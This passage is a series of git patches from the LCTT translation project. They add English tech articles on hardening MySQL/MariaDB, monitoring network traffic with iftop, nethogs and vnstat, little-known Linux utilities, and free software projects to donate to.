J. Vaughan-Nichols ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ +[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2 +[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ +[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ +[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ +[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/ +[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/ +[7]:https://www.android.com/ +[8]:https://www.linuxfoundation.org/ +[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9 +[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/ +[11]:https://www.kernel.org/releases.html +[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc +[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ +[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ +[15]:http://www.zdnet.com/blog/open-source/ +[16]:http://www.zdnet.com/topic/enterprise-software/ From 3236bf1492f749ad8066aee6ccba2ac6ef832fb6 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:47:47 +0800 Subject: [PATCH 0445/1627] =?UTF-8?q?20171209-12=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...riaDB Security Best Practices for Linux.md | 186 ++++++++++++++++++ 1 file changed, 186 insertions(+) create mode 100644 sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md diff --git a/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md b/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md new file mode 100644 index 0000000000..5cf9169661 --- /dev/null +++ b/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md @@ -0,0 +1,186 @@ +12 MySQL/MariaDB Security Best Practices for Linux +============================================================ + +MySQL is the world’s most popular open source database system and MariaDB (a fork of MySQL) is the world’s fastest growing open source database system. After installing MySQL server, it is insecure in it’s default configuration, and securing it is one of the essential tasks in general database management. + +This will contribute to hardening and boosting of overall Linux server security, as attackers always scan vulnerabilities in any part of a system, and databases have in the past been key target areas. A common example is the brute-forcing of the root password for the MySQL database. + +In this guide, we will explain useful MySQL/MariaDB security best practice for Linux. + +### 1\. Secure MySQL Installation + +This is the first recommended step after installing MySQL server, towards securing the database server. This script facilitates in improving the security of your MySQL server by asking you to: + +* set a password for the root account, if you didn’t set it during installation. + +* disable remote root user login by removing root accounts that are accessible from outside the local host. + +* remove anonymous-user accounts and test database which by default can be accessed by all users, even anonymous users. + +``` +# mysql_secure_installation +``` + +After running it, set the root password and answer the series of questions by entering [Yes/Y] and press [Enter]. + + [![Secure MySQL Installation](https://www.tecmint.com/wp-content/uploads/2017/12/Secure-MySQL-Installation.png)][2] + +Secure MySQL Installation + +### 2\. Bind Database Server To Loopback Address + +This configuration will restrict access from remote machines, it tells the MySQL server to only accept connections from within the localhost. You can set it in main configuration file. + +``` +# vi /etc/my.cnf [RHEL/CentOS] +# vi /etc/mysql/my.conf [Debian/Ubuntu] +OR +# vi /etc/mysql/mysql.conf.d/mysqld.cnf [Debian/Ubuntu] +``` + +Add the following line below under `[mysqld]` section. + +``` +bind-address = 127.0.0.1 +``` + +### 3\. Disable LOCAL INFILE in MySQL + +As part of security hardening, you need to disable local_infile to prevent access to the underlying filesystem from within MySQL using the following directive under `[mysqld]` section. + +``` +local-infile=0 +``` + +### 4\. Change MYSQL Default Port + +The Port variable sets the MySQL port number that will be used to listen on TCP/ IP connections. The default port number is 3306 but you can change it under the [mysqld] section as shown. + +``` +Port=5000 +``` + +### 5\. Enable MySQL Logging + +Logs are one of the best ways to understand what happens on a server, in case of any attacks, you can easily see any intrusion-related activities from log files. You can enable MySQL logging by adding the following variable under the `[mysqld]` section. + +``` +log=/var/log/mysql.log +``` + +### 6\. Set Appropriate Permission on MySQL Files + +Ensure that you have appropriate permissions set for all mysql server files and data directories. The /etc/my.conf file should only be writeable to root. This blocks other users from changing database server configurations. + +``` +# chmod 644 /etc/my.cnf +``` + +### 7\. Delete MySQL Shell History + +All commands you execute on MySQL shell are stored by the mysql client in a history file: ~/.mysql_history. This can be dangerous, because for any user accounts that you will create, all usernames and passwords typed on the shell will recorded in the history file. + +``` +# cat /dev/null > ~/.mysql_history +``` + +### 8\. Don’t Run MySQL Commands from Commandline + +As you already know, all commands you type on the terminal are stored in a history file, depending on the shell you are using (for example ~/.bash_history for bash). An attacker who manages to gain access to this history file can easily see any passwords recorded there. + +It is strongly not recommended to type passwords on the command line, something like this: + +``` +# mysql -u root -ppassword_ +``` + [![Connect MySQL with Password](https://www.tecmint.com/wp-content/uploads/2017/12/Connect-MySQL-with-Password.png)][3] + +Connect MySQL with Password + +When you check the last section of the command history file, you will see the password typed above. + +``` +# history +``` + [![Check Command History](https://www.tecmint.com/wp-content/uploads/2017/12/Check-Command-History.png)][4] + +Check Command History + +The appropriate way to connect MySQL is. + +``` +# mysql -u root -p +Enter password: +``` + +### 9\. Define Application-Specific Database Users + +For each application running on the server, only give access to a user who is in charge of a database for a given application. For example, if you have a wordpress site, create a specific user for the wordpress site database as follows. + +``` +# mysql -u root -p +MariaDB [(none)]> CREATE DATABASE osclass_db; +MariaDB [(none)]> CREATE USER 'osclassdmin'@'localhost' IDENTIFIED BY 'osclass@dmin%!2'; +MariaDB [(none)]> GRANT ALL PRIVILEGES ON osclass_db.* TO 'osclassdmin'@'localhost'; +MariaDB [(none)]> FLUSH PRIVILEGES; +MariaDB [(none)]> exit +``` + +and remember to always remove user accounts that are no longer managing any application database on the server. + +### 10\. Use Additional Security Plugins and Libraries + +MySQL includes a number of security plugins for: authenticating attempts by clients to connect to mysql server, password-validation and securing storage for sensitive information, which are all available in the free version. + +You can find more here: [https://dev.mysql.com/doc/refman/5.7/en/security-plugins.html][5] + +### 11\. Change MySQL Passwords Regularly + +This is a common piece of information/application/system security advice. How often you do this will entirely depend on your internal security policy. However, it can prevent “snoopers” who might have been tracking your activity over an long period of time, from gaining access to your mysql server. + +``` +MariaDB [(none)]> USE mysql; +MariaDB [(none)]> UPDATE user SET password=PASSWORD('YourPasswordHere') WHERE User='root' AND Host = 'localhost'; +MariaDB [(none)]> FLUSH PRIVILEGES; +``` + +### 12\. Update MySQL Server Package Regularly + +It is highly recommended to upgrade mysql/mariadb packages regularly to keep up with security updates and bug fixes, from the vendor’s repository. Normally packages in default operating system repositories are outdated. + +``` +# yum update +# apt update +``` + +After making any changes to the mysql/mariadb server, always restart the service. + +``` +# systemctl restart mariadb #RHEL/CentOS +# systemctl restart mysql #Debian/Ubuntu +``` + +Read Also: [15 Useful MySQL/MariaDB Performance Tuning and Optimization Tips][6] + +That’s all! We love to hear from you via the comment form below. Do share with us any MySQL/MariaDB security tips missing in the above list. + +-------------------------------------------------------------------------------- + +via: https://www.tecmint.com/mysql-mariadb-security-best-practices-for-linux/ + +作者:[ Aaron Kili ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.tecmint.com/author/aaronkili/ +[1]:https://www.tecmint.com/learn-mysql-mariadb-for-beginners/ +[2]:https://www.tecmint.com/wp-content/uploads/2017/12/Secure-MySQL-Installation.png +[3]:https://www.tecmint.com/wp-content/uploads/2017/12/Connect-MySQL-with-Password.png +[4]:https://www.tecmint.com/wp-content/uploads/2017/12/Check-Command-History.png +[5]:https://dev.mysql.com/doc/refman/5.7/en/security-plugins.html +[6]:https://www.tecmint.com/mysql-mariadb-performance-tuning-and-optimization/ +[7]:https://www.tecmint.com/author/aaronkili/ +[8]:https://www.tecmint.com/10-useful-free-linux-ebooks-for-newbies-and-administrators/ +[9]:https://www.tecmint.com/free-linux-shell-scripting-books/ From 37b098258afb468e38ac8b56d8e6ad587524214e Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:50:08 +0800 Subject: [PATCH 0446/1627] =?UTF-8?q?20171209-13=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Simple Excellent Linux Network Monitors.md | 189 ++++++++++++++++++ 1 file changed, 189 insertions(+) create mode 100644 sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md diff --git a/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md b/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md new file mode 100644 index 0000000000..28b784e763 --- /dev/null +++ b/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md @@ -0,0 +1,189 @@ +3 Simple, Excellent Linux Network Monitors +============================================================ + +![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network") +Learn more about your network connections with the iftop, Nethogs, and vnstat tools.[Used with permission][3] + +You can learn an amazing amount of information about your network connections with these three glorious Linux networking commands. iftop tracks network connections by process number, Nethogs quickly reveals what is hogging your bandwidth, and vnstat runs as a nice lightweight daemon to record your usage over time. + +### iftop + +The excellent [iftop][8] listens to the network interface that you specify, and displays connections in a top-style interface. + +This is a great little tool for quickly identifying hogs, measuring speed, and also to maintain a running total of your network traffic. It is rather surprising to see how much bandwidth we use, especially for us old people who remember the days of telephone land lines, modems, screaming kilobits of speed, and real live bauds. We abandoned bauds a long time ago in favor of bit rates. Baud measures signal changes, which sometimes were the same as bit rates, but mostly not. + +If you have just one network interface, run iftop with no options. iftop requires root permissions: + +``` +$ sudo iftop +``` + +When you have more than one, specify the interface you want to monitor: + +``` +$ sudo iftop -i wlan0 +``` + +Just like top, you can change the display options while it is running. + +* **h** toggles the help screen. + +* **n** toggles name resolution. + +* **s** toggles source host display, and **d** toggles the destination hosts. + +* **s** toggles port numbers. + +* **N** toggles port resolution; to see all port numbers toggle resolution off. + +* **t** toggles the text interface. The default display requires ncurses. I think the text display is more readable and better-organized (Figure 1). + +* **p** pauses the display. + +* **q** quits the program. + + +![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display") +Figure 1: The text display is readable and organized.[Used with permission][1] + +When you toggle the display options, iftop continues to measure all traffic. You can also select a single host to monitor. You need the host's IP address and netmask. I was curious how much of a load Pandora put on my sad little meager bandwidth cap, so first I used dig to find their IP address: + +``` +$ dig A pandora.com +[...] +;; ANSWER SECTION: +pandora.com. 267 IN A 208.85.40.20 +pandora.com. 267 IN A 208.85.40.50 +``` + +What's the netmask? [ipcalc][9] tells us: + +``` +$ ipcalc -b 208.85.40.20 +Address: 208.85.40.20 +Netmask: 255.255.255.0 = 24 +Wildcard: 0.0.0.255 +=> +Network: 208.85.40.0/24 +``` + +Now feed the address and netmask to iftop: + +``` +$ sudo iftop -F 208.85.40.20/24 -i wlan0 +``` + +Is that not seriously groovy? I was surprised to learn that Pandora is easy on my precious bits, using around 500Kb per hour. And, like most streaming services, Pandora's traffic comes in spurts and relies on caching to smooth out the lumps and bumps. + +You can do the same with IPv6 addresses, using the **-G** option. Consult the fine man page to learn the rest of iftop's features, including customizing your default options with a personal configuration file, and applying custom filters (see [PCAP-FILTER][10] for a filter reference). + +### Nethogs + +When you want to quickly learn who is sucking up your bandwidth, Nethogs is fast and easy. Run it as root and specify the interface to listen on. It displays the hoggy application and the process number, so that you may kill it if you so desire: + +``` +$ sudo nethogs wlan0 + +NetHogs version 0.8.1 + +PID USER PROGRAM DEV SENT RECEIVED +7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec +5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec +TOTAL 12.546 556.618 KB/sec +``` + +Nethogs has few options: cycling between kb/s, kb, b, and mb, sorting by received or sent packets, and adjusting the delay between refreshes. See `man nethogs`, or run `nethogs -h`. + +### vnstat + +[vnstat][11] is the easiest network data collector to use. It is lightweight and does not need root permissions. It runs as a daemon and records your network statistics over time. The `vnstat`command displays the accumulated data: + +``` +$ vnstat -i wlan0 +Database updated: Tue Oct 17 08:36:38 2017 + + wlan0 since 10/17/2017 + + rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB + + monthly + rx | tx | total | avg. rate + ------------------------+-------------+-------------+--------------- + Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s + ------------------------+-------------+-------------+--------------- + estimated 85 MiB | 5 MiB | 90 MiB | + + daily + rx | tx | total | avg. rate + ------------------------+-------------+-------------+--------------- + today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s + ------------------------+-------------+-------------+--------------- + estimated 125 MiB | 8 MiB | 133 MiB | +``` + +By default it displays all network interfaces. Use the `-i` option to select a single interface. Merge the data of multiple interfaces this way: + +``` +$ vnstat -i wlan0+eth0+eth1 +``` + +You can filter the display in several ways: + +* **-h** displays statistics by hours. + +* **-d** displays statistics by days. + +* **-w** and **-m** displays statistics by weeks and months. + +* Watch live updates with the **-l** option. + +This command deletes the database for wlan1 and stops watching it: + +``` +$ vnstat -i wlan1 --delete +``` + +This command creates an alias for a network interface. This example uses one of the weird interface names from Ubuntu 16.04: + +``` +$ vnstat -u -i enp0s25 --nick eth0 +``` + +By default vnstat monitors eth0\. You can change this in `/etc/vnstat.conf`, or create your own personal configuration file in your home directory. See `man vnstat` for a complete reference. + +You can also install vnstati to create simple, colored graphs (Figure 2): + +``` +$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png +``` + + +![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati") +Figure 2: You can create simple colored graphs with vnstati.[Used with permission][2] + +See `man vnstati` for complete options. + + _Learn more about Linux through the free ["Introduction to Linux" ][7]course from The Linux Foundation and edX._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors + +作者:[CARLA SCHRODER ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/files/images/fig-1png-8 +[5]:https://www.linux.com/files/images/fig-2png-5 +[6]:https://www.linux.com/files/images/bannerpng-3 +[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[8]:http://www.ex-parrot.com/pdw/iftop/ +[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc +[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html +[11]:http://humdi.net/vnstat/ From d4ef22d511d955dfbe7341b0de86b3b4ef11ba64 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:53:54 +0800 Subject: [PATCH 0447/1627] =?UTF-8?q?20171209-14=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20170413 More Unknown Linux Commands.md | 131 ++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 sources/tech/20170413 More Unknown Linux Commands.md diff --git a/sources/tech/20170413 More Unknown Linux Commands.md b/sources/tech/20170413 More Unknown Linux Commands.md new file mode 100644 index 0000000000..f5507d3802 --- /dev/null +++ b/sources/tech/20170413 More Unknown Linux Commands.md @@ -0,0 +1,131 @@ +More Unknown Linux Commands +============================================================ + + +![unknown Linux commands](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/outer-limits-of-linux.jpg?itok=5L5xfj2v "unknown Linux commands") +>Explore the outer limits of Linux with Carla Schroder in this roundup of little-known utilities.[Creative Commons Zero][2]Pixabay + +A roundup of the fun and little-known utilities `termsaver`, `pv`, and `calendar`. `termsaver` is an ASCII screensaver for the console, and `pv` measures data throughput and simulates typing. Debian's `calendar` comes with a batch of different calendars, and instructions for making your own. + +![Linux commands](https://www.linux.com/sites/lcom/files/styles/floated_images/public/linux-commands-fig-1.png?itok=HveXXLLK "Linux commands") + +Figure 1: Star Wars screensaver.[Used with permission][1] + +### Terminal Screensaver + +Why should graphical desktops have all the fun with fancy screensavers? Install `termsaver` to enjoy fancy ASCII screensavers like matrix, clock, starwars, and a couple of not-safe-for-work screens. More on the NSFW screens in a moment. + +`termsaver` is included in Debian/Ubuntu, and if you're using a boring distro that doesn't package fun things (like CentOS), you can download it from [termsaver.brunobraga.net][7] and follow the simple installation instructions. + +Run `termsaver -h` to see a list of screens: + +``` + randtxt displays word in random places on screen + starwars runs the asciimation Star Wars movie + urlfetcher displays url contents with typing animation + quotes4all displays recent quotes from quotes4all.net + rssfeed displays rss feed information + matrix displays a matrix movie alike screensaver + clock displays a digital clock on screen + rfc randomly displays RFC contents + jokes4all displays recent jokes from jokes4all.net (NSFW) + asciiartfarts displays ascii images from asciiartfarts.com (NSFW) + programmer displays source code in typing animation + sysmon displays a graphical system monitor +``` + +Then run your chosen screen with `termsaver [screen name]`, e.g. `termsaver matrix`, and stop it with Ctrl+c. Get information on individual screens by running `termsaver [screen name] -h`. Figure 1 is from the `starwars` screen, which runs our old favorite [Asciimation Wars][8]. + +The not-safe-for-work screens pull in online feeds. They're not my cup of tea, but the good news is `termsaver` is a gaggle of Python scripts, so they're easy to hack to connect to any RSS feed you desire. + +### pv + +The `pv` command is one of those funny little utilities that lends itself to creative uses. Its intended use is monitoring data copying progress, like when you run `rsync` or create a `tar`archive. When you run `pv` without options the defaults are: + +* -p progress. + +* -t timer, total elapsed time. + +* -e, ETA, time to completion. This is often inaccurate as `pv` cannot always know the size of the data you are moving. + +* -r, rate counter, or throughput. + +* -b, byte counter. + +This is what an `rsync` transfer looks like: + +``` +$ rsync -av /home/carla/ /media/carla/backup/ | pv +sending incremental file list +[...] +103GiB 0:02:48 [ 615MiB/s] [ <=> +``` + +Create a tar archive like this example: + +``` +$ tar -czf - /file/path| (pv > backup.tgz) + 885MiB 0:00:30 [28.6MiB/s] [ <=> +``` + +`pv` monitors processes. To see maximum activity monitor a Web browser process. It is amazing how much activity that generates: + +``` +$ pv -d 3095 + 58:/home/carla/.pki/nssdb/key4.db: 0 B 0:00:33 + [ 0 B/s] [<=> ] + 78:/home/carla/.config/chromium/Default/Visited Links: + 256KiB 0:00:33 [ 0 B/s] [<=> ] + ] + 85:/home/carla/.con...romium/Default/data_reduction_proxy_leveldb/LOG: + 298 B 0:00:33 [ 0 B/s] [<=> ] +``` + +Somewhere on the Internet I stumbled across a most entertaining way to use `pv` to echo back what I type: + +``` +$ echo "typing random stuff to pipe through pv" | pv -qL 8 +typing random stuff to pipe through pv +``` + +The normal `echo` command prints the whole line at once. Piping it through `pv` makes it appear as though it is being re-typed. I have no idea if this has any practical value, but I like it. The `-L`controls the speed of the playback, in bytes per second. + +`pv` is one of those funny little old commands that has acquired a giant batch of options over the years, including fancy formatting options, multiple output options, and transfer speed modifiers. `man pv` reveals all. + +### /usr/bin/calendar + +It's amazing what you can learn by browsing `/usr/bin` and other commands directories, and reading man pages. `/usr/bin/calendar` on Debian/Ubuntu is a modification of the BSD calendar, but it omits the moon and sun phases. It retains multiple calendars including `calendar.computer, calendar.discordian, calendar.music`, and `calendar.lotr`. On my system the man page lists different calendars than exist in `/usr/bin/calendar`. This example displays the Lord of the Rings calendar for the next 60 days: + +``` +$ calendar -f /usr/share/calendar/calendar.lotr -A 60 +Apr 17 An unexpected party +Apr 23 Crowning of King Ellesar +May 19 Arwen leaves Lorian to wed King Ellesar +Jun 11 Sauron attacks Osgilliath +``` + +The calendars are plain text files so you can easily create your own. The easy way is to copy the format of the existing calendar files. `man calendar` contains detailed instructions for creating your own calendar file. + +Once again we come to the end too quickly. Take some time to cruise your own filesystem to dig up interesting commands to play with. + + _Learn more about Linux through the free ["Introduction to Linux" ][5]course from The Linux Foundation and edX._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/4/more-unknown-linux-commands + +作者:[ CARLA SCHRODER][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://www.linux.com/files/images/linux-commands-fig-1png +[4]:https://www.linux.com/files/images/outer-limits-linuxjpg +[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[6]:https://www.addtoany.com/share#url=https%3A%2F%2Fwww.linux.com%2Flearn%2Fintro-to-linux%2F2017%2F4%2Fmore-unknown-linux-commands&title=More%20Unknown%20Linux%20Commands +[7]:http://termsaver.brunobraga.net/ +[8]:http://www.asciimation.co.nz/ From c64baad040d51200952baf7823145224c71c4f7d Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:57:49 +0800 Subject: [PATCH 0448/1627] =?UTF-8?q?20171209-15=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... to 1 free software project every month.md | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md diff --git a/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md b/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md new file mode 100644 index 0000000000..d2e2b5f5c1 --- /dev/null +++ b/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md @@ -0,0 +1,104 @@ +New Year’s resolution: Donate to 1 free software project every month +============================================================ + +### Donating just a little bit helps ensure the open source software I use remains alive + +Free and open source software is an absolutely critical part of our world—and the future of technology and computing. One problem that consistently plagues many free software projects, though, is the challenge of funding ongoing development (and support and documentation).  + +With that in mind, I have finally settled on a New Year’s resolution for 2017: to donate to one free software project (or group) every month—or the whole year. After all, these projects are saving me a boatload of money because I don’t need to buy expensive, proprietary packages to accomplish the same things. + +#### + Also on Network World: [Free Software Foundation shakes up its list of priority projects][19] + + +I’m not setting some crazy goal here—not requiring that I donate beyond my means. Heck, some months I may be able to donate only a few bucks. But every little bit helps, right?  + +To help me accomplish that goal, below is a list of free software projects with links to where I can donate to them. Organized by categories, just because. I’m scheduling a monthly calendar item to remind me to bring up this page and donate to one of these projects.  + +This isn’t a complete list—not by any measure—but it’s a good starting point. Apologies to the (many) great projects out there that I missed. + +#### Linux distributions  + +[elementary OS][20] — In addition to the distribution itself (which is based, in part, on Ubuntu), this team also develops the Pantheon desktop environment.  + +[Solus][21] — This is a “from scratch” distro using their own custom-developed desktop environment, “Budgie.”  + +[Ubuntu MATE][22] — It’s Ubuntu—with Unity ripped off and replaced with MATE. I like to think of this as “What Ubuntu was like back when I still used Ubuntu.”  + +[Debian][23] — If you use Ubuntu or elementary or Mint, you are using a system based on Debian. Personally, I use Debian on my [PocketCHIP][24]. + +#### Linux components  + +[PulseAudio][25] — PulsAudio is all over the place now. If it stopped being supported and maintained, that would be… highly inconvenient.  + +#### Productivity/Creation  + +[Gimp][26] — The GNU Image Manipulation Program is one of the most famous free software projects—and the standard for cross-platform raster design tools.  + +[FreeCAD][27] — When people talk about difficulty in moving from Windows to Linux, the lack of CAD software often crops up. Supporting projects such as FreeCAD helps to remove that barrier.  + +[OpenShot][28] — Video editing on Linux (and other free software desktops) has improved tremendously over the past few years. But there is still work to be done.  + +[Blender][29] — What is Blender? A 3D modelling suite? A video editor? A game creation system? All three (and more)? Whatever you use Blender for, it’s amazing.  + +[Inkscape][30] — This is the most fantastic vector graphics editing suite on the planet (in my oh-so-humble opinion).  + +[LibreOffice / The Document Foundation][31] — I am writing this very document in LibreOffice. Donating to their foundation to help further development seems to be in my best interests.  + +#### Software development  + +[Python Software Foundation][32] — Python is a great language and is used all over the place.  + +#### Free and open source foundations  + +[Free Software Foundation][33] — “The Free Software Foundation (FSF) is a nonprofit with a worldwide mission to promote computer user freedom. We defend the rights of all software users.”  + +[Software Freedom Conservancy][34] — “Software Freedom Conservancy helps promote, improve, develop and defend Free, Libre and Open Source Software (FLOSS) projects.”  + +Again—this is, by no means, a complete list. Not even close. Luckily many projects provide easy donation mechanisms on their websites. + +Join the Network World communities on [Facebook][17] and [LinkedIn][18] to comment on topics that are top of mind. + +-------------------------------------------------------------------------------- + +via: https://www.networkworld.com/article/3160174/linux/new-years-resolution-donate-to-1-free-software-project-every-month.html + +作者:[ Bryan Lunduke][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.networkworld.com/author/Bryan-Lunduke/ +[1]:https://www.networkworld.com/article/3143583/linux/linux-y-things-i-am-thankful-for.html +[2]:https://www.networkworld.com/article/3152745/linux/5-rock-solid-linux-distros-for-developers.html +[3]:https://www.networkworld.com/article/3130760/open-source-tools/elementary-os-04-review-and-interview-with-the-founder.html +[4]:https://www.networkworld.com/video/51206/solo-drone-has-linux-smarts-gopro-mount +[5]:https://twitter.com/intent/tweet?url=https%3A%2F%2Fwww.networkworld.com%2Farticle%2F3160174%2Flinux%2Fnew-years-resolution-donate-to-1-free-software-project-every-month.html&via=networkworld&text=New+Year%E2%80%99s+resolution%3A+Donate+to+1+free+software+project+every+month +[6]:https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.networkworld.com%2Farticle%2F3160174%2Flinux%2Fnew-years-resolution-donate-to-1-free-software-project-every-month.html +[7]:http://www.linkedin.com/shareArticle?url=https%3A%2F%2Fwww.networkworld.com%2Farticle%2F3160174%2Flinux%2Fnew-years-resolution-donate-to-1-free-software-project-every-month.html&title=New+Year%E2%80%99s+resolution%3A+Donate+to+1+free+software+project+every+month +[8]:https://plus.google.com/share?url=https%3A%2F%2Fwww.networkworld.com%2Farticle%2F3160174%2Flinux%2Fnew-years-resolution-donate-to-1-free-software-project-every-month.html +[9]:http://reddit.com/submit?url=https%3A%2F%2Fwww.networkworld.com%2Farticle%2F3160174%2Flinux%2Fnew-years-resolution-donate-to-1-free-software-project-every-month.html&title=New+Year%E2%80%99s+resolution%3A+Donate+to+1+free+software+project+every+month +[10]:http://www.stumbleupon.com/submit?url=https%3A%2F%2Fwww.networkworld.com%2Farticle%2F3160174%2Flinux%2Fnew-years-resolution-donate-to-1-free-software-project-every-month.html +[11]:https://www.networkworld.com/article/3160174/linux/new-years-resolution-donate-to-1-free-software-project-every-month.html#email +[12]:https://www.networkworld.com/article/3143583/linux/linux-y-things-i-am-thankful-for.html +[13]:https://www.networkworld.com/article/3152745/linux/5-rock-solid-linux-distros-for-developers.html +[14]:https://www.networkworld.com/article/3130760/open-source-tools/elementary-os-04-review-and-interview-with-the-founder.html +[15]:https://www.networkworld.com/video/51206/solo-drone-has-linux-smarts-gopro-mount +[16]:https://www.networkworld.com/video/51206/solo-drone-has-linux-smarts-gopro-mount +[17]:https://www.facebook.com/NetworkWorld/ +[18]:https://www.linkedin.com/company/network-world +[19]:http://www.networkworld.com/article/3158685/open-source-tools/free-software-foundation-shakes-up-its-list-of-priority-projects.html +[20]:https://www.patreon.com/elementary +[21]:https://www.patreon.com/solus +[22]:https://www.patreon.com/ubuntu_mate +[23]:https://www.debian.org/donations +[24]:http://www.networkworld.com/article/3157210/linux/review-pocketchipsuper-cheap-linux-terminal-that-fits-in-your-pocket.html +[25]:https://www.patreon.com/tanuk +[26]:https://www.gimp.org/donating/ +[27]:https://www.patreon.com/yorikvanhavre +[28]:https://www.patreon.com/openshot +[29]:https://www.blender.org/foundation/donation-payment/ +[30]:https://inkscape.org/en/support-us/donate/ +[31]:https://www.libreoffice.org/donate/ +[32]:https://www.python.org/psf/donations/ +[33]:http://www.fsf.org/associate/ +[34]:https://sfconservancy.org/supporter/ From 19566f7a2dbe8fbc3b0de4c45f97fdde2a6ba480 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 16:01:24 +0800 Subject: [PATCH 0449/1627] =?UTF-8?q?20171209-16=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ing an Open Source Project A Free Guide.md | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 sources/tech/20171201 Launching an Open Source Project A Free Guide.md diff --git a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md new file mode 100644 index 0000000000..0d3fa9e18c --- /dev/null +++ b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md @@ -0,0 +1,85 @@ +Launching an Open Source Project: A Free Guide +============================================================ + +![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/project-launch-1024x645.jpg) + +Launching a project and then rallying community support can be complicated, but the new guide to Starting an Open Source Project can help. + +Increasingly, as open source programs become more pervasive at organizations of all 